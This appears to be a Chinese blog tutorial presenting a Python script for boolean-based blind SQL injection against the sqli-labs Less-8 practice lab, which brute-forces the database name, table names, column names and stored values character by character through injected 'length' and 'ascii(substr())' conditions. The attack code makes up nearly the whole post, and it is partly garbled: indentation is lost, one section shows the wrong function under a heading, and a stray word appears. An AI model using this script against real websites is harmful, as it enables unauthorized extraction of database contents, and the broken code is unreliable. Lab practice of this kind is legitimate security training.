sql盲注脚本

例子 sql-labs /Less-8

需要模块 request

基本思路 判断页面是否是正确页面→判断数据库长度 → 爆破数据库名 → 判断表的个数 → 判断每个表的长度 → 爆破每个表的表名 → 判断字段的个数 → 判断每个字段的长度 → 爆破字段名 → 判断每个字段有多少条内容 → 判断内容的长度 → 爆破字段的内容 

判断页面是否是正确页面

def get_html(url):
#"我的功能判断页面内容是否包含关键字,来判断传递参数是否为条件成立"
res = requests.get(url=url,headers=headers)
if "You are in" in res.text:
return True
else:
return False

判断数据库长度

def get_databaseNL():
    "我的作用获取数据库名字长度"
    for num in range(1, 21):
        getinfo = " and length(database())=%s --+" % num#判断表的长度
        fullurl = url + getinfo
        if get_html(fullurl):#拼接url 
            break
    return num

爆破数据库名

def get_databaseName(num):
"我的作用是获取数据库名"
dbname = ""
for i in range(1, num + 1):
for j in range(38, 126):
getinfo = " and ascii(substr(database(),%s,1))=%s --+" % (i, j)#判断数据库名
fullurl = url + getinfo
if get_html(fullurl):
dbname += chr(j)
list1.append(chr(j))
break
return dbname

判断表的个数

def get_databasenumber(dbname):
"判断表的个数"
for number1 in range(1,40):
ges=f"and (select count(table_name) from information_schema.tables where table_schema='{dbname}') =%s --+"%number1 # 判断表的个数
gesurl=url+ges
if get_html(gesurl):
break
return number1

判断表的长度以及爆表名

def get_databasetablesnumber(dbname,number1):
'判断表的长度 爆表名'
tablename=""
for a in range(0,number1):#对表的个数进行循环
for b in range(1,10):#长度随机1-10
wes= f" and length(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),1))={b} --+"
inurl1=url+wes
if get_html(inurl1):
for qweq in range(0,b+1):#对表的长度循环
for item in range(38, 126):#ascii
wei=f" and ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{qweq},1))={item} --+"
swei=url+wei
if get_html(swei):
"拼接表名"
tablename += chr(item)
if len(tablename) == b :
list2.append(tablename)
tablename=""
break
return tablename

判断字段的个数

def get_cloumnsnumber(dbname):
'查列的个数'
for number2 in range(0,40):
ges1=f" and (select count(column_name) from information_schema.columns where table_name='{dbname}') = %s --+ "%number2
gesurl1=url+ges1
if get_html(gesurl1):
break
return number2

判断字段的长度及爆破列名

def get_len(name,name1,name2):#判断列的长度
passname = ''
for cloum in range(0,cse+1): #个数循环
for number4 in range(1,50):
wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
wers=url+wwwes
if get_html(wers):
for we in range(1, number4 + 1):#长度
for lng in range(38,126):#值
waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
cyurl = url + waxyls
if get_html(cyurl):
passname += chr(lng)
if len(passname) == number4:
list4.append(passname)
passname = ''
break
return number4

判断每个字段里面内容的条数

def get_count(ll,ls,lw):#判断内容的条数
for cyy in range(1,20):
wwwse=f'and (select count({ll}) from {ls}.{lw})=%s --+'%cyy
foinurl=url+wwwse
if get_html(foinurl):
break
return cyy

判断字段长度及字段内容

def get_len(name,name1,name2):#判断内容的长度
passname = ''
for cloum in range(0,cse+1): #个数循环
for number4 in range(1,50):
wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
wers=url+wwwes
if get_html(wers):
for we in range(1, number4 + 1):#长度
for lng in range(38,126):#值
waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
cyurl = url + waxyls
if get_html(cyurl):
passname += chr(lng)
if len(passname) == number4:
list4.append(passname)
passname = ''
break
return number4

调用部分

if __name__ == "__main__":
url = "http://sql1/Less-8/?id=1'"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"} # 第二步添加头部信息
awt=get_databaseNL()
print('数据库长度为',awt)
get_databaseName(awt)
c = "".join(list1)
print('数据库名为',c)
print('该库下一共有',get_databasenumber(c),'个表')
print(get_databasetablesnumber(c,get_databasenumber(c)))
print("库名",list2)
while True:
cloumns = input("请输入想要查询的表(输入q退出):")
if cloumns == 'q' :
break
get_columnname(cloumns,get_cloumnsnumber(cloumns))

print('列名',list3)
list3=[]
cyyin=input("请输入想查询的列(按e退出):")
if cyyin == 'e':
break
cse=get_count(cyyin,c,cloumns)
get_len(cyyin,c,cloumns)
print(list4)
list4=[]

总代码

import requests
list1=[]
list2=[]
list3=[]
list4=[]
def get_html(url):
#"我的功能判断页面内容是否包含关键字,来判断传递参数是否为条件成立"
res = requests.get(url=url,headers=headers)
if "You are in" in res.text:
return True
else:
return False


def get_databaseNL():
"我的作用获取数据库名字长度"
for num in range(1, 21):
getinfo = " and length(database())=%s --+" % num#判断表的长度
fullurl = url + getinfo
if get_html(fullurl):#拼接然后判断
break
return num


def get_databaseName(num):
"我的作用是获取数据库名"
dbname = ""
for i in range(1, num + 1):
for j in range(38, 126):
getinfo = " and ascii(substr(database(),%s,1))=%s --+" % (i, j)#判断数据库名
fullurl = url + getinfo
if get_html(fullurl):
dbname += chr(j)
list1.append(chr(j))
break
return dbname
def get_databasenumber(dbname):
"判断表的个数"
for number1 in range(1,40):
ges=f"and (select count(table_name) from information_schema.tables where table_schema='{dbname}') =%s --+"%number1 # 判断表的个数
gesurl=url+ges
if get_html(gesurl):
break
return number1
def get_databasetablesnumber(dbname,number1):
'判断表的长度 爆表名'
tablename=""
for a in range(0,number1):#对表的个数进行循环
for b in range(1,10):#长度随机1-10
wes= f" and length(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),1))={b} --+"
inurl1=url+wes
if get_html(inurl1):
for qweq in range(0,b+1):#对表的长度循环
for item in range(38, 126):#ascii
wei=f" and ascii(substr((select table_name from information_schema.tables where table_schema='{dbname}' limit {a},1),{qweq},1))={item} --+"
swei=url+wei
if get_html(swei):
"拼接表名"
tablename += chr(item)
if len(tablename) == b :
list2.append(tablename)
tablename=""
break
return tablename
def get_cloumnsnumber(dbname):
'查列的个数'
for number2 in range(0,40):
ges1=f" and (select count(column_name) from information_schema.columns where table_name='{dbname}') = %s --+ "%number2
gesurl1=url+ges1
if get_html(gesurl1):
break
return number2
def get_columnname(cloumns,number3):
columnname = ""
for czh in range(0, number3):#对列的个数进行循环
for dwm in range(1, 30):#爆长度
wes = f" and length(substr((select column_name from information_schema.columns where table_name ='{cloumns}' limit {czh},1),1)) = {dwm}--+ "
#长度
inurl1 = url + wes
if get_html(inurl1):
for qweqe in range(0, dwm + 1):#对长度循环
for items in range(38, 126):#爆值
wei = f" and ascii(substr((select column_name from information_schema.columns where table_name='{cloumns}' limit {czh},1),{qweqe},1))={items} --+ "#字段
swei = url + wei
if get_html(swei):
columnname += chr(items)
if len(columnname) == dwm:
list3.append(columnname)
columnname = ""
break
return columnname
def get_count(ll,ls,lw):#判断内容的条数
for cyy in range(1,20):
wwwse=f'and (select count({ll}) from {ls}.{lw})=%s --+'%cyy
foinurl=url+wwwse
if get_html(foinurl):
break
return cyy

def get_len(name,name1,name2):#判断内容的长度
passname = ''
for cloum in range(0,cse+1): #个数循环
for number4 in range(1,50):
wwwes=f'and length(substr( (select {name} from {name1}.{name2} limit {cloum},1),1)) ={number4} --+'
wers=url+wwwes
if get_html(wers):
for we in range(1, number4 + 1):#长度
for lng in range(38,126):#值
waxyls = f'and ascii(substr((select {name} from {name1}.{name2} limit {cloum},1),{we},1))={lng} --+'
cyurl = url + waxyls
if get_html(cyurl):
passname += chr(lng)
if len(passname) == number4:
list4.append(passname)
passname = ''
break
return number4



if __name__ == "__main__":
url = "http://sql1/Less-8/?id=1'"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0"} # 第二步添加头部信息
awt=get_databaseNL()
print('数据库长度为',awt)
get_databaseName(awt)
c = "".join(list1)
print('数据库名为',c)
print('该库下一共有',get_databasenumber(c),'个表')
print(get_databasetablesnumber(c,get_databasenumber(c)))
print("库名",list2)
while True:
cloumns = input("请输入想要查询的表(输入q退出):")
if cloumns == 'q' :
break
get_columnname(cloumns,get_cloumnsnumber(cloumns))

print('列名',list3)
list3=[]
cyyin=input("请输入想查询的列(按e退出):")
if cyyin == 'e':
break
cse=get_count(cyyin,c,cloumns)
get_len(cyyin,c,cloumns)
print(list4)
list4=[]

covfefe

上一篇

MSF的基本使用

下一篇
评论
发表评论 说点什么
还没有评论
192